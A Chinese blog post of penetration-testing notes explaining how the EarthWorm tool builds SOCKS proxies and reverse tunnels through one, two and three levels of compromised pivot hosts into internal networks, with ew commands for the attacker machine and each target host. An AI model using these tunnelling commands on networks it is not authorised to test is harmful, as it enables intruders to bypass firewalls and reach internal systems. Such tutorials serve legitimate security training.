【渗透测试笔记】之【内网渗透——应用层隧道(EarthWorm的使用:各种复杂内网(一二三级网络)环境中的socks代理方法))】

最新推荐文章于 2024-05-13 11:02:42 发布
最新推荐文章于 2024-05-13 11:02:42 发布
阅读量1.2k 收藏 8
点赞数 1
分类专栏: 渗透测试 隐秘通信隧道技术 内网渗透 文章标签: 网络 渗透测试 内网渗透 隧道 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/120992329
版权
本文详细介绍了如何利用EarthWorm工具在不同网络环境中,通过一级、二级甚至三级跳板机进行网络穿透,访问内网特定资源。包括了跳板机有公网IP和无公网IP的情况,以及流量走向的解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

EarthWorm下载地址

https://github.com/AA8j/SecTools/tree/main/ew

1. 普通网络

在普通网络环境下,可直接通过跳板机访问内网特定资源。

1.1 跳板机存在公网IP

1.1.1 网络环境

目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机)

1.1.2 使用方法

目标主机(公网IP:1.1.1.1,可访问特定内网资源):

ew -s ssocksd -l 8888

侦听本机的8888端口,提供socks代理

1.1.3 流量走向

本地主机--->1.1.1.1:8888--->特定内网资源

1.2 跳板机不存在公网IP,可出网

1.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(192.168.1.1,可出网,可访问特定内网资源)(跳板机)

1.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s rcsocks -l 1080 -e 8888

侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

目标主机B(192.168.1.1,可出网)(跳板机):

ew -s rssocks -d 1.1.1.1 -e 8888

主动连接1.1.1.1的8888端口,打通隧道。

1.2.3 流量走向

本地主机--->1.1.1.1:1080---->1.1.1.1:8888--->192.168.1.1--->特定内网资源

2. 二级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机可以访问内网特定资源。

2.1 一级跳板机有公网IP

2.1.1 网络环境

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.1.2 使用方法

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999

侦听9999端口,提供socks代理

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机):

ew -s lcx_tran -l 1080 -f 192.168.1.1 -g 9999

侦听本机1080端口,并转发到172.16.1.1:9999

2.1.3 流量走向

本地主机--->1.1.1.1:1080--->172.16.1.1:9999--->特定内网资源

2.2 一级跳板机无公网IP

2.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机A(内网IP:192.168.1.1,出网,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888

侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999

侦听9999端口,提供socks代理

目标主机A(内网IP:192.168.1.1,出网,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999

将1.1.1.1:8888和172.16.1.1:9999双向建立连接,打通隧道。

2.2.3 流量走向

本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->特定内网资源

3. 三级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机也不能访问,三级跳板机才可以访问内网特定资源。

同上可以总结出,一级跳板机肯定是要能出网的,只是有公网IP和没有公网IP两种情况。

这里假设其没有公网IP(有公网IP的情况参考二级网络,更简单)。

3.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)
目标主机C(内网IP:172.16.1.1,不出网,可访问主机D,不可访问特定内网资源)(二级跳板机)
目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

3.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888

侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接

目标主机C(内网IP:172.16.1.1,不出网,不可访问特定内网资源)(二级跳板机)

ew -s lcx_listen -l 9999 -e 7777

同样也是侦听9999端口,提供socks代理
并且将9999的代理发送到7777端口,此时也侦听7777端口,等待反弹连接

目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999

访问攻击机的8888端口和内网172.16.1.1的9999端口,将攻击机与C主机连通。

目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

ew -s ssocksd -d 172.16.1.1 -e 7777

回连打通CD之间的隧道。

3.3 流量走向

本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->172.16.1.1:7777--->10.1.1.1--->内网特定资源

参考链接:http://rootkiter.com/EarthWorm/

内网渗透-Earthworm的简单使用内网穿透工具)
lza20001103的博客
08-11 2082
内网渗透-Earthworm的简单使用内网穿透工具)
网络安全kali渗透学习 web渗透入门 OSI各层进行功能上的详解阐述
xueshenlaila的博客
02-10 2534
以下对OSI各层进行功能上的大概阐述,不详细深究。 因为每一层实际都是一个复杂的层。 后面我也会根据个人方向展开部分层的深入学习。 这里我们就大概了解一下。 我们从最顶层——应用层 开始介绍。 整个过程以公司A和公司B的一次商业报价单发送为例子进行讲解。 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全kali/web安全/渗透测试/-小白入门到精通 最网最全内容!_哔哩哔哩_bilibili 文字版↓: 年底了号主把我自己
内网渗透工具Earthworm简单使用
1
02-15 4044
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。 项目地址:https://github.com/idlefire/ew 打开项目的文件,里面非常清楚的写了如何使用,我们
EarthWorm结合proxifier的使用学习
来到了学渣的博客
05-31 2007
拿下一个目标机器的web权限后,如何在本机就可以通过这台被拿下webshell的机器访问内网的其他主机的端口服务呢? 拿下一个shell后,想要访问这个shell主机的其他内网机器的服务,可以用earthworm作为一个流量转发,把ew对应的系统文件上传到这台有shell的主机进行正向或者反向的代理配置。使得攻击机可以通过这台有shell的主机在本地就可以访问目标内网其他机器 Earthworm是什么 网穿透神器 EarthWorm(简称 EW) 是一套轻量便携且功能强大的网络穿透工具,基于标准 C
渗透测试笔记】之【内网渗透——应用层隧道EarthWorm使用:各种复杂内网一二三网络
2401_84970106的博客
05-13 940
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
earthworm内网渗透.zip
最新发布
11-29
在当前的网络安全领域,内网渗透是一种常见的安全测试手段,用于评估...“earthworm内网渗透”是一个涉及在内网环境中进行安全测试的工具或方法,其中可能包括多种技术和策略,以识别和评估网络中的安全漏洞和缺陷。
内网渗透测试技术
09-13
内网渗透测试是一种模拟攻击者攻击网络内部系统的安全评估方法,目的是发现和修复网络内部的安全隐患。本知识点将详细介绍内网渗透测试中的关键技术点和实践步骤,包括内网转发、信息收集、横向移动和收尾工程。 ...
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大...相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-Linux等。
使用EarthWorm创建Socks5代理进行内网渗透教程
"这篇教程介绍了如何使用EarthWorm (EW) 作为Socks5代理进行内网渗透。EW是一款多功能的隧道工具,适用于多种操作系统,包括Linux、Windows等。文章内容包括如何在公网的Ubuntu服务器上配置 EW 作为反向Socks5代理,...
EarthWorm-20180630.zip
08-05
EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS等
实操EarthWorm代理工具的使用
lxz021202的博客
03-25 1336
实操ew代理工具的使用方法,包括正反代理和单一或双重代理
2.内网渗透之端口转发
weixin_30551963的博客
01-13 823
转载自freebuf:https://www.freebuf.com/articles/web/170970.html 本文主要介绍一下端口转发工具。文中工具下载地址:https://github.com/Brucetg/Pentest-tools 这里博主在本地搭建虚拟机环境来进行学习: win2003(开启防火墙)作为内网环境:192.168.0.107 win10作为外网环境:1...
内网穿透大杀器--EarthWorm
热门推荐
大方子
08-24 2万+
0x00 前言如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持! 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。 本文给大家推荐一款内网穿透神器EarthWorm(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。 它强在哪些方面呢? 1.可穿...
earthworm四步走(解决拨入VPN后使用burp无法抓包的问题)
kk的博客
07-30 1200
三、执行命令:ew_for_Win.exe -s ssocksd -l 8888。四、设置burp上游代理
EarthWorm(ew)复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 2218
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
EarthWorm 常用命令总结
lweiheng blog
12-28 3457
EarthWorm 常用命令总结 文章目录EarthWorm 常用命令总结0 介绍1 命令详解2 使用实例2.1 建立ssocks5代理2.2 反弹ssocks5代理2.3 端口转发 0 介绍 EarthWorm内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。 为实现这些功能,EarthWorm建立了六大功能模块。 分别是 ssocksd , rcsocks , rssocks , l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值